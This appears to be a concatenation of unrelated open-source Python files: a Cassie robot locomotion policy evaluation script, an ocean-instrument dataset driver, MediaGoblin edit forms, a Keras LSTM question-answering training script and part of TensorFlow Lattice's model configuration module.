not working for 3D. Input ax: a matplotlib axis, e.g., as output from plt.gca(). 
''' x_limits = ax.get_xlim3d() y_limits = ax.get_ylim3d() z_limits = ax.get_zlim3d() x_range = abs(x_limits[1] - x_limits[0]) x_middle = np.mean(x_limits) y_range = abs(y_limits[1] - y_limits[0]) y_middle = np.mean(y_limits) z_range = abs(z_limits[1] - z_limits[0]) z_middle = np.mean(z_limits) # The plot bounding box is a sphere in the sense of the infinity # norm, hence I call half the max range the plot radius. plot_radius = 0.5*max([x_range, y_range, z_range]) ax.set_xlim3d([x_middle - plot_radius, x_middle + plot_radius]) ax.set_ylim3d([y_middle - plot_radius, y_middle + plot_radius]) ax.set_zlim3d([z_middle - plot_radius, z_middle + plot_radius]) def eval_policy(policy, args, run_args, testing_speed): max_traj_len = args.traj_len + args.ramp_up visualize = args.viz # run_args.dyn_random = True env = CassieEnv(traj="aslip", state_est=run_args.state_est, no_delta=run_args.no_delta, learn_gains=run_args.learn_gains, ik_baseline=run_args.ik_baseline, dynamics_randomization=run_args.dyn_random, clock_based=run_args.clock_based, reward="aslip_old", history=run_args.history) if args.debug: env.debug = True print(env.reward_func) if hasattr(policy, 'init_hidden_state'): policy.init_hidden_state() orient_add = 0 if visualize: env.render() render_state = True state = env.reset_for_test() done = False timesteps = 0 eval_reward = 0 # Data to track time_log = [] # time in seconds traj_info = [] # Information from reference trajectory library actual_state_info = [] # actual mujoco state of the robot l_footstep = [] # (time, left foot desired placement, left foot actual placement) r_footstep = [] # (time, right foot desired placement, right foot actual placement) # footstep = [] env.update_speed(testing_speed) print(env.speed) while timesteps < max_traj_len: if hasattr(env, 'simrate'): start = time.time() # if (not env.vis.ispaused()): # Update Orientation env.orient_add = orient_add # quaternion = euler2quat(z=orient_add, y=0, x=0) # iquaternion = inverse_quaternion(quaternion) # # TODO: Should probably not assume these indices. Should make them not hard coded # if env.state_est: # curr_orient = state[1:5] # curr_transvel = state[15:18] # else: # curr_orient = state[2:6] # curr_transvel = state[20:23] # new_orient = quaternion_product(iquaternion, curr_orient) # if new_orient[0] < 0: # new_orient = -new_orient # new_translationalVelocity = rotate_by_quaternion(curr_transvel, iquaternion) # if env.state_est: # state[1:5] = torch.FloatTensor(new_orient) # state[15:18] = torch.FloatTensor(new_translationalVelocity) # # state[0] = 1 # For use with StateEst. Replicate hack that height is always set to one on hardware. 
# else: # state[2:6] = torch.FloatTensor(new_orient) # state[20:23] = torch.FloatTensor(new_translationalVelocity) action = policy.forward(torch.Tensor(state), deterministic=True).detach().numpy() state, reward, done, _ = env.step(action) # if timesteps > args.ramp_up: # print(env.counter) a, _, _, d = env.get_traj_and_state_info() traj_info.append(a) actual_state_info.append(d) time_log.append(timesteps / 40) if a[1][2] == 0.0: l_footstep.append(np.linalg.norm(a[1] - d[1])) elif a[2][2] == 0.0: r_footstep.append(np.linalg.norm(a[2] - d[2])) # if traj_info[] # if env.lfoot_vel[2] < -0.6: # print("left foot z vel over 0.6: ", env.lfoot_vel[2]) # if env.rfoot_vel[2] < -0.6: # print("right foot z vel over 0.6: ", env.rfoot_vel[2]) eval_reward += reward timesteps += 1 qvel = env.sim.qvel() # print("actual speed: ", np.linalg.norm(qvel[0:2])) # print("commanded speed: ", env.speed) if visualize: render_state = env.render() # if hasattr(env, 'simrate'): # # assume 40hz # end = time.time() # delaytime = max(0, 1000 / 40000 - (end-start)) # time.sleep(delaytime) actual_state_info = actual_state_info[:-1] traj_info = traj_info[:-1] time_log = time_log[:-1] print("Eval reward: ", eval_reward) traj_info = np.array(traj_info) actual_state_info = np.array(actual_state_info) time_log = np.array(time_log) fig = plt.figure(figsize=(10,10)) ax = fig.add_subplot(111, projection='3d') ax.set_title("Taskspace tracking performance : {} m/s (simulation)".format(testing_speed)) ax.plot(traj_info[:,0,0], traj_info[:,0,1], traj_info[:,0,2], label='ROM', c='g') ax.plot(traj_info[:,1,0], traj_info[:,1,1], traj_info[:,1,2], c='g') ax.plot(traj_info[:,2,0], traj_info[:,2,1], traj_info[:,2,2], c='g') ax.plot(actual_state_info[:,0,0], actual_state_info[:,0,1], actual_state_info[:,0,2], label='robot', c='r') ax.plot(actual_state_info[:,1,0], actual_state_info[:,1,1], actual_state_info[:,1,2], c='r') ax.plot(actual_state_info[:,2,0], actual_state_info[:,2,1], actual_state_info[:,2,2], c='r') set_axes_equal(ax) plt.legend() plt.tight_layout() plt.savefig("./plots/taskspace{}.png".format(testing_speed)) traj_info = traj_info.reshape(-1, 9) actual_state_info = actual_state_info.reshape(-1, 9) time_log = time_log.reshape(-1, 1) l_footstep = np.array(l_footstep) r_footstep = np.array(r_footstep) x_error = np.linalg.norm(traj_info[:,0] - actual_state_info[:,0]) y_error = np.linalg.norm(traj_info[:,1] - actual_state_info[:,1]) z_error = np.linalg.norm(traj_info[:,2] - actual_state_info[:,2]) # print(traj_info.shape) # print(actual_state_info.shape) # print(time_log.shape) # return matrix of logged data return np.array([x_error, y_error, z_error]), np.array([l_footstep, r_footstep]) parser = argparse.ArgumentParser() parser.add_argument("--path", type=str, default="../../trained_models/ppo/Cassie-v0/IK_traj-aslip_aslip_joint_2048_12288_seed-10/", help="path to folder containing policy and run details") parser.add_argument("--traj_len", default=100, type=str) # timesteps once at speed to collect data parser.add_argument("--ramp_up", default=100, type=str) # timesteps for coming up to speed, before data collection starts parser.add_argument("--debug", default=False, action='store_true') parser.add_argument("--viz", default=False, action='store_true') # parser.add_argument("--eval", default=True, action="store_false", help="Whether to call policy.eval() or not") args = parser.parse_args() run_args = pickle.load(open(args.path + "experiment.pkl", "rb")) print(args.path) policy = torch.load(args.path + "actor.pt") # if args.eval: # 
policy.eval() # NOTE: for some reason the saved nodelta_neutral_stateest_symmetry policy needs this but it breaks all new policies... # policy.eval() data = [] footdata = [] speeds = [i/10 for i in range(21)] # 0.0 to 2.0 m/s # speeds = [i/10 for i in range(3, 4)] # 0.0 to 2.0 m/s for speed in speeds: taskspace_data, footplacement_data = eval_policy(policy, args, run_args, speed) data.append(taskspace_data) footdata.append(footplacement_data) data = np.array(data) footdata = np.array(footdata) print(data.shape) print(footdata.shape) # Center of mass position tracking error fig = plt.figure(figsize=(10,10)) ax = fig.add_subplot(111) colors = ["tab:blue", "tab:red", "tab:green"] for i in range(data.shape[0]): x_error = data[i, 0] y_error = data[i, 1] z_error = data[i, 2] if i == 0: ax.bar(i, z_error, label='z', bottom=x_error+y_error, color=colors[0]) ax.bar(i, y_error, label='y', bottom=x_error, color=colors[1]) ax.bar(i, x_error, label='x', color=colors[2]) else: ax.bar(i, z_error, bottom=x_error+y_error, color=colors[0]) ax.bar(i, y_error, bottom=x_error, color=colors[1]) ax.bar(i, x_error, color=colors[2]) ax.set_title('Average COM Tracking Error') ax.set_ylabel('Avg. Error (cm)') ax.set_xticks(np.arange(len(speeds))) ax.set_xticklabels([str(speed) for speed in speeds]) plt.legend() plt.savefig("./plots/compos_err.png") # # Foot Placement tracking error # fig2 = plt.figure(figsize=(10,10)) # ax2 = fig2.add_subplot(111) # colors = ["tab:blue", "tab:red"] # for i in range(footdata.shape[0]): # x_error = np.mean(footdata[i, 0]) # y_error = np.mean(footdata[i, 1]) # # only label once # if i == 0: # ax2.bar(i, y_error, label='y', bottom=x_error, color=colors[0]) # ax2.bar(i, x_error, label='x', color=colors[1]) # else: # ax2.bar(i, y_error, bottom=x_error, color=colors[0]) # ax2.bar(i, x_error, color=colors[1]) # ax2.set_title('Average Foot Placement Error') # ax2.set_ylabel('Avg. Error (cm)') # ax2.set_xticks(np.arange(len(speeds))) # ax2.set_xticklabels([str(speed) for speed in speeds]) # plt.legend() # plt.savefig("./plots/footpos_err.png") # plt.show() """ @package mi.dataset.driver.nutnr_j.cspp @file mi-dataset/mi/dataset/driver/nutnr_j/cspp/nutnr_j_cspp_telemetered_driver.py @author @brief Telemetered driver for the nutnr_j_cspp instrument Release notes: Initial Release """ from mi.dataset.dataset_driver import SimpleDatasetDriver from mi.dataset.dataset_parser import DataSetDriverConfigKeys from mi.dataset.parser.cspp_base import METADATA_PARTICLE_CLASS_KEY from mi.dataset.parser.nutnr_j_cspp import \ NutnrJCsppMetadataTelemeteredDataParticle, \ NutnrJCsppTelemeteredDataParticle, \ NutnrJCsppDarkTelemeteredDataParticle, \ NutnrJCsppParser, \ LIGHT_PARTICLE_CLASS_KEY, \ DARK_PARTICLE_CLASS_KEY from mi.core.versioning import version __author__ = 'jpadula' @version("15.7.2") def parse(unused, source_file_path, particle_data_handler): """ This is the method called by Uframe :param unused :param source_file_path This is the full path and filename of the file to be parsed :param particle_data_handler Java Object to consume the output of the parser :return particle_data_handler """ with open(source_file_path, 'r') as stream_handle: # create an instance of the concrete driver class defined below driver = NutnrJCsppTelemeteredDriver(unused, stream_handle, particle_data_handler) driver.processFileStream() return particle_data_handler class NutnrJCsppTelemeteredDriver(SimpleDatasetDriver): """ The nutnr_j_cspp telemetered driver class extends the SimpleDatasetDriver. 
""" def _build_parser(self, stream_handle): parser_config = { DataSetDriverConfigKeys.PARTICLE_CLASSES_DICT: { METADATA_PARTICLE_CLASS_KEY: NutnrJCsppMetadataTelemeteredDataParticle, LIGHT_PARTICLE_CLASS_KEY: NutnrJCsppTelemeteredDataParticle, DARK_PARTICLE_CLASS_KEY: NutnrJCsppDarkTelemeteredDataParticle } } parser = NutnrJCsppParser(parser_config, stream_handle, self._exception_callback) return parser saksham1115/mediagoblinmediagoblin/edit/forms.py1-10 # GNU MediaGoblin -- federated, autonomous media hosting # Copyright (C) 2011, 2012 MediaGoblin contributors. See AUTHORS. # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see . import wtforms from jsonschema import Draft4Validator from mediagoblin.tools.text import tag_length_validator from mediagoblin.tools.translate import lazy_pass_to_ugettext as _ from mediagoblin.tools.licenses import licenses_as_choices from mediagoblin.tools.metadata import DEFAULT_SCHEMA, DEFAULT_CHECKER from mediagoblin.auth.tools import normalize_user_or_email_field class WebsiteField(wtforms.StringField): """A field that expects a website URL but adds http:// if not provided.""" def process_formdata(self, valuelist): if valuelist: data = valuelist[0] if not data.startswith((u'http://', u'https://')): data = u'http://' + data self.data = data else: super(WebsiteField, self).process_formdata(valuelist) class EditForm(wtforms.Form): title = wtforms.StringField( _('Title'), [wtforms.validators.Length(min=0, max=500)]) description = wtforms.TextAreaField( _('Description of this work'), description=_("""You can use Markdown for formatting.""")) tags = wtforms.StringField( _('Tags'), [tag_length_validator], description=_( "Separate tags by commas.")) slug = wtforms.StringField( _('Slug'), [wtforms.validators.InputRequired(message=_("The slug can't be empty"))], description=_( "The title part of this media's address. 
" "You usually don't need to change this.")) license = wtforms.SelectField( _('License'), [wtforms.validators.Optional(),], choices=licenses_as_choices()) class EditProfileForm(wtforms.Form): bio = wtforms.TextAreaField( _('Bio'), [wtforms.validators.Length(min=0, max=500)], description=_("""You can use Markdown for formatting.""")) url = WebsiteField( _('Website'), [wtforms.validators.Optional(), wtforms.validators.URL(message=_("This address contains errors"))], description=_("www.example.com, http://www.example.com or " "https://www.example.com")) location = wtforms.StringField(_('Hometown')) class EditAccountForm(wtforms.Form): wants_comment_notification = wtforms.BooleanField( description=_("Email me when others comment on my media")) wants_notifications = wtforms.BooleanField( description=_("Enable insite notifications about events.")) license_preference = wtforms.SelectField( _('License preference'), [ wtforms.validators.Optional(), wtforms.validators.AnyOf([lic[0] for lic in licenses_as_choices()]), ], choices=licenses_as_choices(), description=_('This will be your default license on upload forms.')) class EditAttachmentsForm(wtforms.Form): attachment_name = wtforms.StringField( 'Title') attachment_file = wtforms.FileField( 'File') class EditCollectionForm(wtforms.Form): title = wtforms.StringField( _('Title'), [wtforms.validators.Length(min=0, max=500), wtforms.validators.InputRequired(message=_("The title can't be empty"))]) description = wtforms.TextAreaField( _('Description of this collection'), description=_("""You can use Markdown for formatting.""")) slug = wtforms.StringField( _('Slug'), [wtforms.validators.InputRequired(message=_("The slug can't be empty"))], description=_( "The title part of this collection's address. " "You usually don't need to change this.")) class ChangePassForm(wtforms.Form): old_password = wtforms.PasswordField( _('Old password'), [wtforms.validators.InputRequired()], description=_( "Enter your old password to prove you own this account.")) new_password = wtforms.PasswordField( _('New password'), [wtforms.validators.InputRequired(), wtforms.validators.Length(min=6, max=30)], id="password") class ChangeEmailForm(wtforms.Form): new_email = wtforms.StringField( _('New email address'), [wtforms.validators.InputRequired(), normalize_user_or_email_field(allow_user=False)]) password = wtforms.PasswordField( _('Password'), [wtforms.validators.InputRequired()], description=_( "Enter your password to prove you own this account.")) class MetaDataValidator(object): """ Custom validator which runs form data in a MetaDataForm through a jsonschema validator and passes errors recieved in jsonschema to wtforms. :param schema The json schema to validate the data against. By default this uses the DEFAULT_SCHEMA from mediagoblin.tools.metadata. :param format_checker The FormatChecker object that limits which types jsonschema can recognize. By default this uses DEFAULT_CHECKER from mediagoblin.tools.metadata. 
""" def __init__(self, schema=DEFAULT_SCHEMA, format_checker=DEFAULT_CHECKER): self.schema = schema self.format_checker = format_checker def __call__(self, form, field): metadata_dict = {field.data:form.value.data} validator = Draft4Validator(self.schema, format_checker=self.format_checker) errors = [e.message for e in validator.iter_errors(metadata_dict)] if len(errors) >= 1: raise wtforms.validators.ValidationError( errors.pop()) class MetaDataForm(wtforms.Form): identifier = wtforms.StringField(_(u'Identifier'),[MetaDataValidator()]) value = wtforms.StringField(_(u'Value')) class EditMetaDataForm(wtforms.Form): media_metadata = wtforms.FieldList( wtforms.FormField(MetaDataForm, ""), ) import sys from random import shuffle import argparse import numpy as np from keras.models import Sequential from keras.layers.core import Dense, Dropout, Activation from keras.layers.recurrent import LSTM from keras.utils import np_utils, generic_utils from sklearn import preprocessing from sklearn.externals import joblib from spacy.en import English from features import get_questions_tensor_timeseries, get_answers_matrix from utils import grouper, selectFrequentAnswers def main(): parser = argparse.ArgumentParser() parser.add_argument('-num_hidden_units', type=int, default=512) parser.add_argument('-num_lstm_layers', type=int, default=2) parser.add_argument('-dropout', type=float, default=0.2) parser.add_argument('-activation', type=str, default='tanh') args = parser.parse_args() questions_train = open('../data/preprocessed/questions_train2014.txt', 'r').read().decode('utf8').splitlines() questions_lengths_train = open('../data/preprocessed/questions_lengths_train2014.txt', 'r').read().decode('utf8').splitlines() answers_train = open('../data/preprocessed/answers_train2014.txt', 'r').read().decode('utf8').splitlines() images_train = open('../data/preprocessed/images_train2014.txt', 'r').read().decode('utf8').splitlines() max_answers = 1000 questions_train, answers_train, images_train = selectFrequentAnswers(questions_train,answers_train,images_train, max_answers) print 'Loaded questions, sorting by length...' questions_lengths_train, questions_train, answers_train = (list(t) for t in zip(*sorted(zip(questions_lengths_train, questions_train, answers_train)))) #encode the remaining answers labelencoder = preprocessing.LabelEncoder() labelencoder.fit(answers_train) nb_classes = len(list(labelencoder.classes_)) joblib.dump(labelencoder,'../models/labelencoder.pkl') max_len = 30 #25 is max for training, 27 is max for validation word_vec_dim = 300 model = Sequential() model.add(LSTM(output_dim = args.num_hidden_units, activation='tanh', return_sequences=True, input_shape=(max_len, word_vec_dim))) model.add(Dropout(args.dropout)) model.add(LSTM(args.num_hidden_units, return_sequences=False)) model.add(Dense(nb_classes, init='uniform')) model.add(Activation('softmax')) json_string = model.to_json() model_file_name = '../models/lstm_language_only_num_hidden_units_' + str(args.num_hidden_units) + '_num_lstm_layers_' + str(args.num_lstm_layers) + '_dropout_' + str(args.dropout) open(model_file_name + '.json', 'w').write(json_string) print 'Compiling model...' model.compile(loss='categorical_crossentropy', optimizer='rmsprop') print 'Compilation done...' #set up word vectors nlp = English() print 'loaded word2vec features...' ## training print 'Training started...' 
numEpochs = 100 model_save_interval = 5 batchSize = 128 for k in xrange(numEpochs): progbar = generic_utils.Progbar(len(questions_train)) for qu_batch,an_batch,im_batch in zip(grouper(questions_train, batchSize, fillvalue=questions_train[0]), grouper(answers_train, batchSize, fillvalue=answers_train[0]), grouper(images_train, batchSize, fillvalue=images_train[0])): timesteps = len(nlp(qu_batch[-1])) #questions sorted in descending order of length X_q_batch = get_questions_tensor_timeseries(qu_batch, nlp, timesteps) Y_batch = get_answers_matrix(an_batch, labelencoder) loss = model.train_on_batch(X_q_batch, Y_batch) progbar.add(batchSize, values=[("train loss", loss)]) if k%model_save_interval == 0: model.save_weights(model_file_name + '_epoch_{:02d}.hdf5'.format(k)) model.save_weights(model_file_name + '_epoch_{:02d}.hdf5'.format(k+1)) if __name__ == "__main__": main() maresb/lattice1-10 # Copyright 2019 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """TFL model configuration library for canned estimators. To construct a TFL canned estimator, construct a model configuration and pass it to the canned estimator constructor: ```python feature_columns = ... model_config = tfl.configs.CalibratedLatticeConfig(...) feature_analysis_input_fn = create_input_fn(num_epochs=1, ...) train_input_fn = create_input_fn(num_epochs=100, ...) estimator = tfl.estimators.CannedClassifier( feature_columns=feature_columns, model_config=model_config, feature_analysis_input_fn=feature_analysis_input_fn) estimator.train(input_fn=train_input_fn) ``` Supported models are: * **Calibrated linear model**: Constructed using `tfl.configs.CalibratedLinearConfig`. A calibrated linear model that applies piecewise-linear and categorical calibration on the input feature, followed by a linear combination and an optional output piecewise-linear calibration. When using output calibration or when output bounds are specified, the linear layer will apply weighted averaging on calibrated inputs. * **Calibrated lattice model**: Constructed using `tfl.configs.CalibratedLatticeConfig`. A calibrated lattice model applies piecewise-linear and categorical calibration on the input feature, followed by a lattice model and an optional output piecewise-linear calibration. * **Calibrated lattice ensemble model**: Constructed using `tfl.configs.CalibratedLatticeEnsembleConfig`. A calibrated lattice ensemble model applies piecewise-linear and categorical calibration on the input feature, followed by an ensemble of lattice models and an optional output piecewise-linear calibration. Feature calibration and per-feature configurations are set using `tfl.configs.FeatureConfig`. Feature configurations include monotonicity constraints, per-feature regularization (see `tfl.configs.RegularizerConfig`), and lattice sizes for lattice models. 
""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import copy from absl import logging import tensorflow as tf _HPARAM_FEATURE_PREFIX = 'feature' _HPARAM_REGULARIZER_PREFIX = 'regularizer' class _Config(object): """Base class for configs.""" def __init__(self, kwargs): if 'self' in kwargs: kwargs.pop('self') if '__class__' in kwargs: kwargs.pop('__class__') self.__dict__ = kwargs def __repr__(self): return self.__dict__.__repr__() def get_config(self): """Returns a configuration dictionary.""" config = copy.deepcopy(self.__dict__) if 'self' in config: config.pop('self') if '__class__' in config: config.pop('__class__') if 'feature_configs' in config and config['feature_configs'] is not None: config['feature_configs'] = [ tf.keras.utils.serialize_keras_object(feature_config) for feature_config in config['feature_configs'] ] if 'regularizer_configs' in config and config[ 'regularizer_configs'] is not None: config['regularizer_configs'] = [ tf.keras.utils.serialize_keras_object(regularizer_config) for regularizer_config in config['regularizer_configs'] ] if ('reflects_trust_in' in config and config['reflects_trust_in'] is not None): config['reflects_trust_in'] = [ tf.keras.utils.serialize_keras_object(trust_config) for trust_config in config['reflects_trust_in'] ] if 'dominates' in config and config['dominates'] is not None: config['dominates'] = [ tf.keras.utils.serialize_keras_object(dominance_config) for dominance_config in config['dominates'] ] return config @classmethod def deserialize_nested_configs(cls, config, custom_objects=None): """Returns a deserialized configuration dictionary.""" config = copy.deepcopy(config) if 'feature_configs' in config and config['feature_configs'] is not None: config['feature_configs'] = [ tf.keras.utils.deserialize_keras_object( feature_config, custom_objects=custom_objects) for feature_config in config['feature_configs'] ] if 'regularizer_configs' in config and config[ 'regularizer_configs'] is not None: config['regularizer_configs'] = [ tf.keras.utils.deserialize_keras_object( regularizer_config, custom_objects=custom_objects) for regularizer_config in config['regularizer_configs'] ] if ('reflects_trust_in' in config and config['reflects_trust_in'] is not None): config['reflects_trust_in'] = [ tf.keras.utils.deserialize_keras_object( trust_config, custom_objects=custom_objects) for trust_config in config['reflects_trust_in'] ] if 'dominates' in config and config['dominates'] is not None: config['dominates'] = [ tf.keras.utils.deserialize_keras_object( dominance_config, custom_objects=custom_objects) for dominance_config in config['dominates'] ] return config class _HasFeatureConfigs(object): """Base class for configs with `feature_configs` attribute.""" def feature_config_by_name(self, feature_name): """Returns existing or default FeatureConfig with the given name.""" if self.feature_configs is None: self.feature_configs = [] for feature_config in self.feature_configs: if feature_config.name == feature_name: return feature_config feature_config = FeatureConfig(feature_name) self.feature_configs.append(feature_config) return feature_config class _HasRegularizerConfigs(object): """Base class for configs with `regularizer_configs` attribute.""" def regularizer_config_by_name(self, regularizer_name): """Returns existing or default RegularizerConfig with the given name.""" if self.regularizer_configs is None: self.regularizer_configs = [] for regularizer_config in 
self.regularizer_configs: if regularizer_config.name == regularizer_name: return regularizer_config regularizer_config = RegularizerConfig(regularizer_name) self.regularizer_configs.append(regularizer_config) return regularizer_config # pylint: disable=unused-argument class CalibratedLatticeEnsembleConfig(_Config, _HasFeatureConfigs, _HasRegularizerConfigs): """Config for calibrated lattice model. A calibrated lattice ensemble model applies piecewise-linear and categorical calibration on the input feature, followed by an ensemble of lattice models and an optional output piecewise-linear calibration. The ensemble structure can be one of the following and set via the lattice flag: - Expliclit list of list of features specifying features used in each submodel. - A random arrangement (also called Random Tiny Lattices, or RTL). - Crystals growing algorithm: This algorithm first constructs a prefitting model to assess pairwise interactions between features, and then uses those estimates to construct a final model that puts interacting features in the same lattice. For details see "Fast and flexible monotonic functions with ensembles of lattices", Advances in Neural Information Processing Systems, 2016. Examples: Creating a random ensemble (RTL) model: ```python model_config = tfl.configs.CalibratedLatticeEnsembleConfig( num_lattices=6, # number of lattices lattice_rank=5, # number of features in each lattice feature_configs=[...], ) feature_analysis_input_fn = create_input_fn(num_epochs=1, ...) train_input_fn = create_input_fn(num_epochs=100, ...) estimator = tfl.estimators.CannedClassifier( feature_columns=feature_columns, model_config=model_config, feature_analysis_input_fn=feature_analysis_input_fn) estimator.train(input_fn=train_input_fn) ``` You can also construct a random ensemble (RTL) using a `tfl.layers.RTL` layer so long as all features have the same lattice size: ```python model_config = tfl.configs.CalibratedLatticeEnsembleConfig( lattices='rtl_layer', num_lattices=6, # number of lattices lattice_rank=5, # number of features in each lattice feature_configs=[...], ) feature_analysis_input_fn = create_input_fn(num_epochs=1, ...) train_input_fn = create_input_fn(num_epochs=100, ...) estimator = tfl.estimators.CannedClassifier( feature_columns=feature_columns, model_config=model_config, feature_analysis_input_fn=feature_analysis_input_fn) estimator.train(input_fn=train_input_fn) ``` To create a Crystals model, you will need to provide a *prefitting_input_fn* to the estimator constructor. This input_fn is used to train the prefitting model, as described above. The prefitting model does not need to be fully trained, so a few epochs should be enough. ```python model_config = tfl.configs.CalibratedLatticeEnsembleConfig( lattices='crystals', # feature arrangement method num_lattices=6, # number of lattices lattice_rank=5, # number of features in each lattice feature_configs=[...], ) feature_analysis_input_fn = create_input_fn(num_epochs=1, ...) prefitting_input_fn = create_input_fn(num_epochs=5, ...) train_input_fn = create_input_fn(num_epochs=100, ...) estimator = tfl.estimators.CannedClassifier( feature_columns=feature_columns, model_config=model_config, feature_analysis_input_fn=feature_analysis_input_fn prefitting_input_fn=prefitting_input_fn) estimator.train(input_fn=train_input_fn) ``` """ _HAS_DYNAMIC_ATTRIBUTES = True # Required for pytype checks. 
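  # Illustrative sketch (not part of the upstream docstring above): besides
  # 'random', 'rtl_layer' and 'crystals', `lattices` can also be an explicit
  # list of feature-name lists, one per lattice, in which case `num_lattices`
  # and `lattice_rank` need not be given. The feature names here are
  # hypothetical:
  #
  #   model_config = tfl.configs.CalibratedLatticeEnsembleConfig(
  #       lattices=[['age', 'thal'], ['age', 'ca']],
  #       feature_configs=[...],
  #   )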
def __init__(self, feature_configs=None, lattices='random', num_lattices=None, lattice_rank=None, interpolation='hypercube', parameterization='all_vertices', num_terms=2, separate_calibrators=True, use_linear_combination=False, use_bias=False, regularizer_configs=None, output_min=None, output_max=None, output_calibration=False, output_calibration_num_keypoints=10, output_initialization='quantiles', fix_ensemble_for_2d_constraints=True, random_seed=0): # pyformat: disable """Initializes a `CalibratedLatticeEnsembleConfig` instance. Args: feature_configs: A list of `tfl.configs.FeatureConfig` instances that specify configurations for each feature. If a configuration is not provided for a feature, a default configuration will be used. lattices: Should be one of the following: - String `'random'` indicating that the features in each lattice should be selected randomly - String `'rtl_layer'` indicating that the features in each lattice should be selected randomly using a `tfl.layers.RTL` layer. Note that using a `tfl.layers.RTL` layer scales better than using separate `tfl.layers.Lattice` instances for the ensemble. - String `'crystals'` to use a heuristic to construct the lattice ensemble based on pairwise feature interactions - An explicit list of list of feature names to be used in each lattice in the ensemble. num_lattices: Number of lattices in the ensemble. Must be provided if lattices are not explicitly provided. lattice_rank: Number of features in each lattice. Must be provided if lattices are not explicitly provided. interpolation: One of 'hypercube' or 'simplex' interpolation. For a d-dimensional lattice, 'hypercube' interpolates 2^d parameters, whereas 'simplex' uses d+1 parameters and thus scales better. For details see `tfl.lattice_lib.evaluate_with_simplex_interpolation` and `tfl.lattice_lib.evaluate_with_hypercube_interpolation`. parameterization: The parameterization of the lattice function class to use. A lattice function is uniquely determined by specifying its value on every lattice vertex. A parameterization scheme is a mapping from a vector of parameters to a multidimensional array of lattice vertex values. It can be one of: - String `'all_vertices'`: This is the "traditional" parameterization that keeps one scalar parameter per lattice vertex where the mapping is essentially the identity map. With this scheme, the number of parameters scales exponentially with the number of inputs to the lattice. The underlying lattices used will be `tfl.layers.Lattice` layers. - String `'kronecker_factored'`: With this parameterization, for each lattice input i we keep a collection of `num_terms` vectors each having `feature_configs[0].lattice_size` entries (note that all features must have the same lattice size). To obtain the tensor of lattice vertex values, for `t=1,2,...,num_terms` we compute the outer product of the `t'th` vector in each collection, multiply by a per-term scale, and sum the resulting tensors. Finally, we add a single shared bias parameter to each entry in the sum. With this scheme, the number of parameters grows linearly with `lattice_rank` (assuming lattice sizes and `num_terms` are held constant). Currently, only monotonicity shape constraint and bound constraint are supported for this scheme. Regularization is not currently supported. The underlying lattices used will be `tfl.layers.KroneckerFactoredLattice` layers. num_terms: The number of terms in a lattice using `'kronecker_factored'` parameterization. Ignored if parameterization is set to `'all_vertices'`. 
separate_calibrators: If features should be separately calibrated for each lattice in the ensemble. use_linear_combination: If set to true, a linear combination layer will be used to combine ensemble outputs. Otherwise an averaging layer will be used. If output is bounded or output calibration is used, then this layer will be a weighted average. use_bias: If a bias term should be used for the linear combination. regularizer_configs: A list of `tfl.configs.RegularizerConfig` instances that apply global regularization. output_min: Lower bound constraint on the output of the model. output_max: Upper bound constraint on the output of the model. output_calibration: If a piecewise-linear calibration should be used on the output of the lattice. output_calibration_num_keypoints: Number of keypoints to use for the output piecewise-linear calibration. output_initialization: The initial values to setup for the output of the model. When using output calibration, these values are used to initialize the output keypoints of the output piecewise-linear calibration. Otherwise the lattice parameters will be setup to form a linear function in the range of output_initialization. It can be one of: - String `'quantiles'`: Output is initliazed to label quantiles, if possible. - String `'uniform'`: Output is initliazed uniformly in label range. - A list of numbers: To be used for initialization of the output lattice or output calibrator. fix_ensemble_for_2d_constraints: A boolean indicating whether to add missing features to some lattices to resolve potential 2d constraint violations which require lattices from ensemble to either contain both constrained features or none of them, e.g. trapezoid trust constraint requires a lattice that has the "conditional" feature to include the "main" feature. Note that this might increase the final lattice rank. random_seed: Random seed to use for randomized lattices. """ # pyformat: enable super(CalibratedLatticeEnsembleConfig, self).__init__(locals()) @classmethod def from_config(cls, config, custom_objects=None): return CalibratedLatticeEnsembleConfig(**_Config.deserialize_nested_configs( config, custom_objects=custom_objects)) class CalibratedLatticeConfig(_Config, _HasFeatureConfigs, _HasRegularizerConfigs): """Config for calibrated lattice model. A calibrated lattice model applies piecewise-linear and categorical calibration on the input feature, followed by a lattice model and an optional output piecewise-linear calibration. Example: ```python model_config = tfl.configs.CalibratedLatticeConfig( feature_configs=[...], ) feature_analysis_input_fn = create_input_fn(num_epochs=1, ...) train_input_fn = create_input_fn(num_epochs=100, ...) estimator = tfl.estimators.CannedClassifier( feature_columns=feature_columns, model_config=model_config, feature_analysis_input_fn=feature_analysis_input_fn) estimator.train(input_fn=train_input_fn) ``` """ _HAS_DYNAMIC_ATTRIBUTES = True # Required for pytype checks. def __init__(self, feature_configs=None, interpolation='hypercube', parameterization='all_vertices', num_terms=2, regularizer_configs=None, output_min=None, output_max=None, output_calibration=False, output_calibration_num_keypoints=10, output_initialization='quantiles', random_seed=0): """Initializes a `CalibratedLatticeConfig` instance. Args: feature_configs: A list of `tfl.configs.FeatureConfig` instances that specify configurations for each feature. If a configuration is not provided for a feature, a default configuration will be used. 
